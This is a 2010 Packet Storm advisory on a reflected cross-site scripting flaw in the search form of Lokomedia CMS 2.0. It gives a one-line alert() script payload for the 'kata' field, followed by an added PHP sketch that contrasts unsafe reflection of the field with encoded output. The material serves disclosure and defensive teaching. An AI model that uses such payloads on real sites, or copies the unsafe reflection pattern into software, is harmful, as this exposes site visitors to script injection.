Lokomedia CMS 2.0 Cross Site Scripting

2010-05-20T00:00:00
ID PACKETSTORM:89712
Type packetstorm
Reporter Andrea Bocchetti
Modified 2010-05-20T00:00:00

Description

                                        
                                            `  
  
# [x] Author: Andrea Bocchetti   
# [x] Homepage : www.geekit.it  
  
  
// Software Info   
# [x] Vendor : http://bukulokomedia.com/home  
# [x] CMS : Lokomedia CMS  
# [x] Version: [2.0]  
  
  
  
  
[#]-------------------------------------------------------------------------------------------[#]  
#  
# [x] Bug :   
  
  
<form method=POST action='hasil-pencarian.html'>   
<input name=kata type=text size=17 />   
<input type=submit value=Go />   
</form>   
  
Exploit:  
  
# Submit <script>alert(/XSS/)</script> in the form's kata field to trigger the XSS   
#  
  
`
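Added example, not part of the original advisory and not Lokomedia's own code: the advisory shows only the search form, so this sketch assumes the results page is rendered by PHP and echoes the `kata` POST field back to the visitor. The function names, the "Hasil pencarian" markup and the 100-character limit are hypothetical; the sample input is the test string quoted in the advisory.

```php
<?php
declare(strict_types=1);

// Hypothetical helper: encode untrusted text for an HTML body or a quoted attribute.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Vulnerable pattern (assumed): the search term is reflected without encoding,
// so markup in kata becomes part of the response page.
function render_results_unsafe(array $post): string
{
    $kata = $post['kata'] ?? '';
    return "<p>Hasil pencarian: $kata</p>";
}

// Hardened pattern: normalise type and length, then encode at every output point.
function render_results_safe(array $post): string
{
    $kata = $post['kata'] ?? '';
    if (!is_string($kata)) {
        $kata = '';                      // kata[]=x arrives as an array, not a string
    }
    // Length cap is a hypothetical limit; mb_substr needs the mbstring extension.
    $kata = mb_substr(trim($kata), 0, 100, 'UTF-8');

    // Attributes are quoted so the encoded value cannot break out of value="...".
    return '<p>Hasil pencarian: ' . h($kata) . '</p>'
         . '<form method="post" action="hasil-pencarian.html">'
         . '<input name="kata" type="text" size="17" value="' . h($kata) . '" />'
         . '<input type="submit" value="Go" />'
         . '</form>';
}

// Constructed sample request carrying the advisory's test string.
$post = ['kata' => '<script>alert(/XSS/)</script>'];

echo render_results_unsafe($post), "\n";  // script element reaches the page intact
echo render_results_safe($post), "\n";    // angle brackets arrive as &lt; and &gt;
```

Encoding belongs at the point of output rather than at input, so the same helper has to wrap every place the search term is written back, including the prefilled `value` attribute.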